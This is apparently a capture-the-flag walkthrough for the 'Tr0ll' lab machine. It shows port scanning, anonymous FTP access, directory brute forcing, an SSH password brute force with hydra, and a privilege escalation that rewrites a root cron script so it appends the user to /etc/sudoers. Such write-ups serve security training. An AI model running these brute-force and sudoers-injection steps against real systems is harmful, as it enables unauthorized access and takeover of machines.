Our initial scan yields:
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable] 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA) | 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA) | 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA) |_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST | http-robots.txt: 1 disallowed entry |_/secret |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn't have a title (text/html).
We’ll enumerate these 3 services to get a good understanding of possible vectors, increasing our attack surface and reducing time wasted in rabbit holes.
Starting with FTP we can verify that it actually is FTP, vsftp service and allows anonymous login.
root@kali:/usr/share/nmap/scripts# nmap -sV 192.168.72.138 root@kali:/usr/share/nmap/scripts# nmap --script ftp-anon.nse 192.168.72.138 -p21
Our inital scan was correct. We can now anon FTP login to do some initial investigation.
root@kali:/home# ftp 192.168.72.138 Connected to 192.168.72.138. 220 (vsFTPd 3.0.2) Name (192.168.72.138:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 112 4096 Aug 10 2014 . drwxr-xr-x 2 0 112 4096 Aug 10 2014 .. -rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap 226 Directory send OK.
Trying to PUT or travese into other directories is futile, but all hope is not lost. We are able to capture a lone file of: lol.pcap
We are able to GET this file and save to our local machine. Before we commit to this vector, we’ll enumerate the other services - we can put this on the top or our todo list.
Since SSH is a common and relatively secure service, we won’t consider this a low hanging fruit.
We can verify the SSH service and check if root user accepts passwords (which it does).
root@kali:/# nmap -sV 192.168.72.138 -p22 root@kali:/# ssh -vvv firstname.lastname@example.org
We can try to brute force ssh as root, but we’ll put that near the end of the list.
Running Nikto a few things come up, but nothing real juicy.
- OS: Ubuntu
- 1 entry in robots.txt: /secret
- Apache deafault README page
- Two images with pages /index.html & /secret/index.html
We can use curl to verify headers and check if anything jumps out at us.
root@kali:/# curl -i -L 192.168.72.138 root@kali:/# curl -i -L 192.168.72.138/secret root@kali:/# curl -i -L 192.168.72.138/robots.txt
Nothing really. Let’s brute force some dirs.
root@kali:/# dirb http://192.168.72.138 root@kali:/# gobuster -u http://192.168.72.138 -e -s '200,403,204,500' -w /usr/share/seclists/Discovery/Web_Content/apache.txt
Just what we’ve found from Nikto.
We can always run some larger wordlists to dig into the webserver more - we can put that on our todo list near the end as well.
Plan of Attack
- Investigate lol.pcap
- Brute force SSH with root or found usernames
- Run large wordlist (which we can do in the background)
We’ve download the lol.pcap file, which we can open up with wireshark.
Following this packet capture file by “TCP Stream” you can get an idea on what this file entails. Make sure to remove the filter to see the important part.
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P Sucks, you were so close... gotta TRY HARDER!
Going to http://192.168.72.138/sup3rs3cr3tdirlol gives us a dir listing with roflmao ELF file.
Dowloading it to our local machine, and digging into it, we see a hint..
root@kali:~/Downloads# file roflmao roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped root@kali:~/Downloads# strings roflmao /lib/ld-linux.so.2 libc.so.6 _IO_stdin_used printf __libc_start_main __gmon_start__ GLIBC_2.0 PTRh [^_] Find address 0x0856BF to proceed ;*2$" GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2
Find address 0x0856BF to proceed. Using this string as a directory we find another list of files.
Two folders with two files. One looks like a good user list and the other folder “this_folder_contains_the_password” has a file of “Pass.txt” containing the string: Good_job_:)
Trying the newly created userlist (tru.txt) and the password string, should yield us a successful ssh login correct, or maybe via ftp..? Wrong (I tried)
Since the name of this machien is tr0ll, and we’ve seen it be sneaky previously, we can take a step back and look at the file directory. Nothing hidden in headers or source, but take a look at this again: this_folder_contains_the_password/
“this_folder” - so the string pass.txt would technically be it, right? We’ll see…
root@kali:/# hydra -t 7 -L /home/tru.txt -p Pass.txt 192.168.72.138 ssh ..SNIP.. [ssh] host: 192.168.72.138 login: overflow password: Pass.txt
A successful hit overflow:Pass.txt
Logging in with the creds, we have a limited low priv shell. Going through the basic linux priv esc guide we get to a point where we can search for world writable folders.
$ find / -writable -type d 2>/dev/null /tmp /run/user/1002 /run/shm /run/lock /var/tmp /sys/fs/cgroup/systemd/user/1002.user/14.session /proc/4184/task/4184/fd /proc/4184/fd /proc/4184/map_files
Nothing in the /tmp folder, but something in the /var/tmp folder. An app called cleaner.py (that aint stock) is somewhere with a hint to it being ran by root cron job every 2 minutes.
$ cd /var/log $ cat cronlog */2 * * * * cleaner.py
So let’s try to find this cleaner python app. A basic locate or find command doesn’t bring us any luck. Using the below find command does yield something..
$ find / -name *cleaner* |grep cleaner.py
Looks like it’s located in /lib/log/cleaner.py AND it’s world writable. Since it’s executed by root, we can alter the script to add our low priv user to the /etc/sudoers file.
#!/usr/bin/env python import os import sys try: os.system('echo "overflow ALL=(ALL:ALL) ALL" >> /etc/sudoers') except: sys.exit()
Save it, and wait the 2 minutes per cronlog then..
$ sudo su sudo: unable to resolve host troll [sudo] password for overflow: root@troll:~# whoami root root@troll:~# cat proof.txt Good job, you did it! 702a8c18d29c6f3ca0d99ef5712bfbdc
Good stuff, we have root.